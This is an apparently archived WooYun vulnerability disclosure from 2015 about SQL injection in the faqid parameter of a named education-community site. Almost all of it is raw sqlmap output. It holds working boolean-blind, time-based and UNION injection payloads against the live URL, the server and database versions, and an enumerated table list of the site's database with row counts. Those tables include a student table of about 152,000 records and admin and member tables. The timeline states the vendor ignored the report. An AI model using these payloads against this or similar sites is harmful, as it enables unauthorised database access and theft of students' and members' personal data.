乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-11: 细节已通知厂商并且等待厂商处理中 2015-12-16: 厂商已经主动忽略漏洞,细节向公众公开
http://community.edufe.com.cn/faq/index.php?faqid=26
sqlmap resumed the following injection point(s) from stored session:---Parameter: faqid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: faqid=26 AND 1465=1465 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: faqid=26 AND (SELECT * FROM (SELECT(SLEEP(5)))izHA) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: faqid=26 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766a7071,0x4550524a625963476477,0x716a6a7671),NULL,NULL,NULL,NULL,NULL,NULL-- ---web application technology: PHP 5.2.6, Nginxback-end DBMS: MySQL 5.0.12Database: cc_phpcms+----------------------------+---------+| Table | Entries |+----------------------------+---------+| phpcms_ads_stat | 256361 || activity_registerinfo | 231938 || student | 152303 || activity_responsibility | 150774 || phpcms_keyword | 63697 || edufe_search | 23252 || phpcms_log | 18881 || phpcms_hits | 18230 || activity_assesslog | 17585 || phpcms_content_tag | 15491 || activity_log | 14764 || phpcms_cache_count | 13738 || phpcms_content_count | 11664 || phpcms_c_news | 11654 || phpcms_content | 11650 || phpcms_attachment | 8236 || post_temp | 2076 || activity_productappr | 2039 || activity_product | 2020 || phpcms_space_article | 1893 || phpcms_space_comment | 1807 || phpcms_member_info | 982 || phpcms_member | 979 || phpcms_member_detail | 963 || phpcms_comment | 880 || phpcms_copyfrom | 528 || activity_tag | 434 || phpcms_content_position | 407 || phpcms_member_group_priv | 393 || phpcms_space_blog | 304 || phpcms_menu | 273 || phpcms_space_photo | 251 || phpcms_admin_role_priv | 159 || phpcms_model_field | 131 || phpcms_message | 130 || phpcms_session | 92 || phpcms_vote_option | 84 || phpcms_vote_useroption | 63 || phpcms_area | 59 || phpcms_vote_data | 58 || activity_prodjudge | 27 || phpcms_vote_subject | 27 || phpcms_avatars | 24 || phpcms_space_type | 24 || activity_itemprize | 22 || phpcms_author | 22 || magazine_image | 21 || phpcms_category | 21 || phpcms_process_status | 21 || magazine_article | 19 || activity_itemmanager | 18 || phpcms_space_album | 18 || activity_affiche | 17 || phpcms_faq | 17 || phpcms_space_ctype | 16 || phpcms_search | 15 || phpcms_module | 13 || phpcms_space_template | 12 || phpcms_urlrule | 12 || phpcms_admin_role | 11 || phpcms_space_photo_comment | 11 || phpcms_space_position | 11 || phpcms_admin | 10 || phpcms_block | 10 || phpcms_status | 9 || activity_set | 7 || phpcms_member_group | 6 || phpcms_model | 6 || phpcms_process | 6 || phpcms_role | 6 || phpcms_position | 5 || magazine_info | 4 || phpcms_link | 4 || phpcms_type | 4 || activity_productstate | 3 || activity_userrole | 3 || phpcms_ads | 3 || phpcms_search_type | 3 || phpcms_workflow | 3 || activity_itemtype | 2 || phpcms_ads_place | 2 || phpcms_datasource | 2 || phpcms_space | 2 || phpcms_space_api | 2 || activity_filetcomm | 1 || magazine_type | 1 || phpcms_editor_data | 1 || search_counter | 1 |+----------------------------+---------+
危害等级:无影响厂商忽略
忽略时间:2015-12-16 11:18
漏洞Rank:4 (WooYun评价)
暂无